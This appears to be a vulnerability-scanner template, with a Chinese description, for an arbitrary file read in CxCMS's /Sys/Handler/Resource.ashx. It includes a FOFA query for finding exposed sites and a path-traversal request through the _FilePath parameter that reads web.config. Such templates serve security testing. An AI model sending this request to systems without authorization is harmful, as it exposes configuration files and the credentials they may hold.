漏洞描述
CxCMS存在任意文件读取,由于/Sys/Handler/Resource.ashx页面 _FilePath参数过滤不严,导致可以读取系统敏感文件。
fofa-query: "Powered by CxCms"
id: cxcms-arbitrary-file-read
info:
name: CxCMS Resource.ashx 任意文件读取漏洞
author: daffainfo
severity: high
verified: true
description: |
CxCMS存在任意文件读取,由于/Sys/Handler/Resource.ashx页面 _FilePath参数过滤不严,导致可以读取系统敏感文件。
fofa-query: "Powered by CxCms"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/CxCMS%20Resource.ashx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
rules:
r0:
request:
method: GET
path: /Sys/Handler/Resource.ashx?_FilePath=../../web.config
expression: response.status == 200 && response.body.bcontains(b'<!--编辑器设置-->')
expression: r0()